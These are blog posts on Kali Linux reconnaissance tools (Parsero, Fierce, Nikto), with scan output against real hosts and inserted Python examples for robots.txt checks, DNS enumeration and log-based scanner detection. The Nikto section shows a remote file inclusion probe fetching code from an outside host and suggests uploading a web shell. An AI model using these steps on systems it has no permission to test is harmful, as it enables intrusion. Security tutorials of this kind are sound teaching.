Showing posts with label Kali Linux.

Tuesday, September 02, 2014

Some days ago a friend told me, "Hey! Why didn't you write a post talking about how Parsero has been included in the Kali Linux repository?" "Seriously? I forgot..." So here it is...

As you already know, Kali Linux is one of the most advanced and versatile penetration testing distributions ever made. Kali Linux grew out of an earlier live Linux distribution named BackTrack. It is a GPL-compliant Linux distribution built by penetration testers for penetration testers. With millions of downloads, it has become the most widely adopted penetration testing framework in existence and is used by the security community all over the world.

That is the reason why I am really proud to announce that my tool Parsero has been included in the Kali Linux repositories: http://tools.kali.org/information-gathering/parsero

Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. Each Disallow entry is the URL path of a directory or file hosted on the web server which the administrators don't want indexed by crawlers. For example, "Disallow: /portal/login" tells search engines like Google, Bing and Yahoo not to index www.example.com/portal/login, so nobody can locate it by searching on them.

Sometimes the paths listed in the Disallow entries are directly accessible to users (without using a search engine) just by visiting the URL and the path. Sometimes they are not available to anybody... Because it is really common for administrators to write a lot of Disallow entries, some of which are reachable and some of which are not, you can use Parsero to check the HTTP status code of each Disallow entry and find out automatically whether these directories are available or not.

Also, the fact that the administrator writes a robots.txt doesn't mean that the files or directories listed in it will not be indexed by Bing, Google, Yahoo... For this reason, Parsero is capable of performing searches in Bing to locate content indexed without the web administrator's authorization.
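To make the two checks described above concrete, here is an added example (not Parsero's own code) that parses a robots.txt, collects its Disallow paths and reports which ones a server actually serves. The robots.txt content and the status codes are constructed for the example, and the HTTP request is injected as a callable so it runs offline; to audit a site you administer, pass a function that performs the real HEAD/GET request and returns the status code.

```python
"""Added example (not Parsero's own code): parse a robots.txt, collect the
Disallow paths and check whether each one is actually reachable.

The HTTP fetch is injected as a callable so the example runs offline; a real
audit of your own site would pass a function that does a HEAD/GET request
(for example with urllib) and returns the status code.
"""
from urllib.parse import urljoin

# Constructed sample robots.txt, as an administrator might publish it.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /portal/login
Disallow: /backup/
Disallow: /admin
Disallow: /old-site/
Allow: /public/
Sitemap: https://www.example.com/sitemap.xml
# Disallow: /commented-out
"""

# Constructed status codes standing in for what a real server would answer.
FAKE_STATUS = {
    "https://www.example.com/portal/login": 200,
    "https://www.example.com/backup/": 403,
    "https://www.example.com/admin": 302,
    "https://www.example.com/old-site/": 404,
}


def fake_fetch(url):
    """Offline stand-in for an HTTP request; returns a status code."""
    return FAKE_STATUS.get(url, 404)


def parse_disallows(robots_txt):
    """Return the Disallow paths from robots.txt, in order, without duplicates.

    Comment lines and an empty 'Disallow:' (which means 'allow everything')
    are skipped; inline '#' comments are stripped, as robots parsers do.
    """
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        if field.strip().lower() != "disallow":
            continue
        value = value.strip()
        if value and value not in paths:
            paths.append(value)
    return paths


def check_disallows(base_url, robots_txt, fetch=fake_fetch):
    """Map each Disallow path to its HTTP status and a short verdict.

    A 200 means the path is served to anyone who knows it: robots.txt hid it
    from crawlers only. A 3xx deserves a manual look (it may redirect to a
    login page or straight to the content); 401/403/404 means it is not
    directly reachable.
    """
    results = {}
    for path in parse_disallows(robots_txt):
        url = urljoin(base_url, path)
        status = fetch(url)
        if status == 200:
            verdict = "AVAILABLE"
        elif 300 <= status < 400:
            verdict = "REDIRECT (check manually)"
        else:
            verdict = "not available"
        results[path] = (status, verdict)
    return results


if __name__ == "__main__":
    report = check_disallows("https://www.example.com/", SAMPLE_ROBOTS)
    for path, (status, verdict) in report.items():
        print(f"{status}  {path:<20} {verdict}")
```

The verdict split mirrors the point of the paragraph: a disallowed path that answers 200 is hidden only from well-behaved crawlers, which is exactly the kind of entry an administrator should protect with access control rather than with robots.txt.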

Now, you can run Parsero v0.75 directly from this awesome distribution. So, what do you need to use Parsero in Kali Linux?

Installing Parsero in Kali Linux

First of all, you need to execute:

root@kali:~# apt-get update


Then you can search for Parsero directly in the Kali Linux repositories with the command below:

root@kali:~# apt-cache search parsero



Finally, run the following command to install it.

root@kali:~# apt-get install parsero


Now you can have fun checking the directories or files which could contain sensitive information and should be "anonymous" to the search engines...


Currently I'm working on the next release, which will have another feature. It will be available here: https://github.com/behindthefirewalls/Parsero



Posted on Tuesday, September 02, 2014 by Javier Nieto

No comments

Friday, June 21, 2013

Fierce is a great script written in Perl by RSnake. This tool will help you with the first step of a pentest: reconnaissance.

The idea is to gather as much interesting details as possible about your target before starting the attack.

Fierce is used for DNS enumeration and has been included in the Backtrack and Kali Linux distributions.

It is a great tool for discovering the non-contiguous IP address space of a certain company. You can try a DNS zone transfer, DNS brute force, reverse lookups...




These are the Fierce options.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -h
fierce.pl (C) Copywrite 2006,2007 - By RSnake at http://ha.ckers.org/fierce/

    Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Options:
    -connect    Attempt to make http connections to any non RFC1918
        (public) addresses.  This will output the return headers but
        be warned, this could take a long time against a company with
        many targets, depending on network/machine lag.  I wouldn't
        recommend doing this unless it's a small company or you have a
        lot of free time on your hands (could take hours-days). 
        Inside the file specified the text "Host:\n" will be replaced
        by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

    -delay        The number of seconds to wait between lookups.
    -dns        The domain you would like scanned.
    -dnsfile      Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
    -dnsserver    Use a particular DNS server for reverse lookups
        (probably should be the DNS server of the target).  Fierce
        uses your DNS server for the initial SOA query and then uses
        the target's DNS server for all additional queries by default.
    -file        A file you would like to output to be logged to.
    -fulloutput    When combined with -connect this will output everything
        the webserver sends back, not just the HTTP headers.
    -help        This screen.
    -nopattern    Don't use a search pattern when looking for nearby
        hosts.  Instead dump everything.  This is really noisy but
        is useful for finding other domains that spammers might be
        using.  It will also give you lots of false positives,
        especially on large domains.
    -range        Scan an internal IP range (must be combined with
        -dnsserver).  Note, that this does not support a pattern
        and will simply output anything it finds.  Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

    -search        Search list.  When fierce attempts to traverse up and
        down ipspace it may encounter other servers within other
        domains that may belong to the same company.  If you supply a
        comma delimited list to fierce it will report anything found.
        This is especially useful if the corporate servers are named
        different from the public facing website.  Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

        Note that using search could also greatly expand the number of
        hosts found, as it will continue to traverse once it locates
        servers that you specified in your search list.  The more the
        better.
    -suppress    Suppress all TTY output (when combined with -file).
    -tcptimeout    Specify a different timeout (default 10 seconds).  You
        may want to increase this if the DNS server you are querying
        is slow or has a lot of network lag.
    -threads  Specify how many threads to use while scanning (default
      is single threaded).
    -traverse    Specify a number of IPs above and below whatever IP you
        have found to look for nearby IPs.  Default is 5 above and
        below.  Traverse will not move into other C blocks.
    -version    Output the version number.
    -wide        Scan the entire class C after finding any matching
        hostnames in that class C.  This generates a lot more traffic
        but can uncover a lot more information.
    -wordlist    Use a seperate wordlist (one word per line).  Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt 


We can make a reverse lookup for an entire class C network like 65.55.58.0/24
root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -range 65.55.58.0-255
65.55.58.2    ten1-2-194.co1-6nf-1a.ntwk.msn.net
65.55.58.3    ten1-2-194.co1-6nf-1b.ntwk.msn.net
65.55.58.38    discussions.connect.microsoft.com
65.55.58.183    submit.microsoft.com
65.55.58.186    cvp.membership.microsoft.com
65.55.58.192    microsoftevents.org
65.55.58.197    eugrantsadvisor.com
65.55.58.201    00001001.ch
65.55.58.202    bizspark.microsoft.com
65.55.58.204    cvp.services.microsoft.com
65.55.58.205    piinternalfe2.microsoft.com
65.55.58.206    cvp.services.ppe.microsoft.com
65.55.58.210    livests.test.itasignon.com
65.55.58.211    sts.test.itasignon.com
65.55.58.212    beta.itasignon.microsoft.com
65.55.58.213    itasignon.microsoft.com
65.55.58.214    websitespark.microsoft.com
65.55.58.241    co1vlsc04.microsoft.com
65.55.58.242    co1vlsc05.microsoft.com
65.55.58.243    co1vlsc06.microsoft.com
65.55.58.247    lva.beta.msllab.microsoft.com
65.55.58.248    pi.beta.msllab.microsoft.com


We can try a DNS zone transfer and a DNS brute force against google.es. You can choose the DNS server you want to send the requests to. If none is specified, Fierce queries the DNS servers of the target company. In this case, we send the requests to the OpenDNS server 208.67.222.222.
root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -dns google.es -dnsserver 208.67.222.222
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
...
...
...


You can edit the brute-force wordlist as you want.
root@bt:/pentest/enumeration/dns/fierce# more hosts.txt
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
...
...
...
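The three Fierce runs above (the reverse lookup over a class C range, the wildcard check followed by the wordlist brute force, and the editable hosts.txt) map onto a small amount of logic. The following is an added example in Python, not Fierce's own code, that implements those steps against an injectable resolver. The PTR and A records, the 192.0.2.0/24 and 198.51.100.0/24 addresses and the example.com hostnames are constructed for the example; to run it against a zone you are authorised to test, pass functions that call socket.gethostbyaddr / socket.gethostbyname (or dnspython) instead of the fakes.

```python
"""Added example (not Fierce's own code): the enumeration steps shown above,
a reverse lookup sweep over a /24 and a wordlist brute force guarded by a
wildcard check, written against an injectable resolver.

The records below are constructed for the example, not real DNS data.
"""
import ipaddress
import random
import string

# Constructed PTR records for the sample range (fictional hostnames).
FAKE_PTR = {
    "192.0.2.2": "gw1.example.net",
    "192.0.2.38": "discussions.example.com",
    "192.0.2.183": "submit.example.com",
}

# Constructed A records for the sample zone.
FAKE_A = {
    "accounts.example.com": "198.51.100.10",
    "admin.example.com": "198.51.100.11",
    "academico.example.com": "198.51.100.12",
}


def fake_reverse(ip):
    """Offline stand-in for a PTR lookup: hostname or None."""
    return FAKE_PTR.get(ip)


def fake_forward(name):
    """Offline stand-in for an A lookup: IP string or None."""
    return FAKE_A.get(name)


def reverse_sweep(cidr, reverse=fake_reverse):
    """Reverse-resolve every host address in a network (like fierce -range)."""
    found = {}
    for host in ipaddress.ip_network(cidr, strict=False).hosts():
        name = reverse(str(host))
        if name:
            found[str(host)] = name
    return found


def has_wildcard(domain, forward=fake_forward, probes=3):
    """True if random, almost certainly non-existent names still resolve.

    Fierce runs this check before brute forcing: with wildcard DNS every
    guessed name resolves, so the wordlist results would be meaningless.
    """
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase, k=12))
        if forward(f"{label}.{domain}"):
            return True
    return False


def brute_force(domain, wordlist, forward=fake_forward):
    """Try each word as a subdomain label; return {hostname: ip} for hits.

    Blank lines and '#' comments in the wordlist are ignored. Raises
    RuntimeError on wildcard DNS rather than returning junk.
    """
    if has_wildcard(domain, forward):
        raise RuntimeError(f"{domain} has wildcard DNS; results would be noise")
    hits = {}
    for word in wordlist:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        name = f"{word}.{domain}"
        ip = forward(name)
        if ip:
            hits[name] = ip
    return hits


if __name__ == "__main__":
    for ip, name in reverse_sweep("192.0.2.0/24").items():
        print(f"{ip:<16} {name}")
    # Constructed wordlist in the same one-word-per-line format as hosts.txt.
    words = ["0", "01", "a", "academico", "acceso", "accounts", "admin", "www"]
    for name, ip in brute_force("example.com", words).items():
        print(f"{ip:<16} {name}")
```

The wildcard check is the part worth copying into any DNS brute-force script: without it, a zone with a catch-all record makes every wordlist entry look like a hit, which is why Fierce prints "Checking for wildcard DNS..." before it starts.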



Posted on Friday, June 21, 2013 by Javier Nieto

No comments

Wednesday, June 19, 2013

Nikto is one of the most popular web security applications to run when you begin a web pentesting project.

You can download Nikto from http://cirt.net/nikto2. This tool has been included in the Backtrack and Kali Linux distributions.

Nikto is an open source web server scanner. It tests web servers by making requests for multiple items. Nikto checks:

  • Over 6500 dangerous files/CGIs.
  • More than 1250 outdated versions of several web servers.
  • Specific problems on over 270 servers.
  • Presence of index files.
  • HTTP server options like TRACE.
  • Installed software and web servers.


Nikto makes a lot of requests quickly and is not designed as a stealthy tool. If you run Nikto against a remote web server, the administrator will see a lot of lines in the web server log that show the attack. Some SIEMs have default rules for correlating these logs and could raise an alarm warning the administrators about the attack.

These are the Nikto options.
jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have found out the server and PHP versions and a lot of interesting folders.

We have discovered an RFI (Remote File Inclusion) on this server...
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL makes the server fetch PHP code from http://cirt.net/rfiinc.txt?, whose content is the following:
<?php phpinfo(); ?>

This code executes "phpinfo", but if you want, you can upload a web shell in order to gain access to the server.
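Two passages above deserve a concrete detection example: the note that a Nikto run leaves a trail in the web server log that a SIEM can correlate, and the RFI probe that Nikto reported (`/info.php?file=http://cirt.net/rfiinc.txt?`). The following is an added example, not Nikto's output and not any SIEM vendor's rule set, that runs three simple rules over Apache combined-format access log lines. The log lines, the client addresses and the User-Agent string are constructed for the example (the UA follows the shape Nikto advertises by default), and the window and threshold values are illustrative, not settings from any real product.

```python
"""Added example (not Nikto's or any SIEM's code): three detections over
Apache combined-format access log lines, illustrating what a scan like the
one above leaves behind in the web server log.

  1. a User-Agent that identifies itself as Nikto,
  2. a burst of 404s from one client inside a short time window,
  3. a query parameter whose value is itself a URL, the shape of the RFI
     probe (/info.php?file=http://...) reported above.

Log lines, addresses and thresholds are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed User-Agents: the Nikto-style one and a plain browser.
NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000001)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) Firefox/21.0"


def _line(ip, sec, target, status, ua):
    """Build one constructed combined-format line at 16:23:<sec>."""
    return (f'{ip} - - [19/Jun/2013:16:23:{sec:02d} +0200] "GET {target} HTTP/1.1" '
            f'{status} 209 "-" "{ua}"')


# Constructed log: a scanner burst from 203.0.113.7 plus normal traffic.
SAMPLE_LOG = [
    _line("203.0.113.7", 35, "/", 200, NIKTO_UA),
    _line("203.0.113.7", 36, "/datos/", 404, NIKTO_UA),
    _line("203.0.113.7", 36, "/ftp/", 404, NIKTO_UA),
    _line("203.0.113.7", 37, "/imagenes/", 404, NIKTO_UA),
    _line("203.0.113.7", 37, "/README.TXT", 404, NIKTO_UA),
    _line("203.0.113.7", 38, "/temp/", 404, NIKTO_UA),
    _line("203.0.113.7", 38, "/tmp/", 404, NIKTO_UA),
    _line("203.0.113.7", 39, "/info.php?file=http://cirt.net/rfiinc.txt?", 200, NIKTO_UA),
    _line("198.51.100.20", 40, "/index.php", 200, BROWSER_UA),
    _line("198.51.100.20", 41, "/favicon.ico", 404, BROWSER_UA),
]

URL_VALUE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window_seconds=10, not_found_threshold=5):
    """Return (rule, client_ip, detail) alerts, at most one per rule per client."""
    alerts = []
    flagged_ua, flagged_rfi = set(), set()
    per_ip_404 = defaultdict(list)
    for r in filter(None, map(parse_line, lines)):
        ip = r["ip"]
        if "nikto" in r["ua"].lower() and ip not in flagged_ua:
            flagged_ua.add(ip)
            alerts.append(("scanner-user-agent", ip, r["ua"]))
        for key, value in parse_qsl(urlsplit(r["target"]).query, keep_blank_values=True):
            if URL_VALUE_RE.match(value) and ip not in flagged_rfi:
                flagged_rfi.add(ip)
                alerts.append(("url-in-query-param", ip, f"{key}={value}"))
        if r["status"] == 404:
            per_ip_404[ip].append(r["ts"])
    # Sliding window over each client's 404 timestamps.
    for ip, stamps in per_ip_404.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= not_found_threshold:
                alerts.append(("404-burst", ip, f"{end - start + 1} x 404 within {window_seconds}s"))
                break
    return alerts


if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG):
        print(f"{rule:<20} {ip:<15} {detail}")
```

The User-Agent rule is the weakest of the three, since the string is trivially changed; the 404 burst and the URL-shaped parameter value survive that and are the ones worth keeping in a correlation rule. The third rule is also a cheap way to spot RFI attempts against any `include`-style parameter, independent of which scanner sent them.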




The next line is interesting too. Nikto has located some URLs where you could upload files with your own source code.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.



Nikto is one of the first applications that I run when a client requests a web audit from me.


Posted on Wednesday, June 19, 2013 by Javier Nieto

2 comments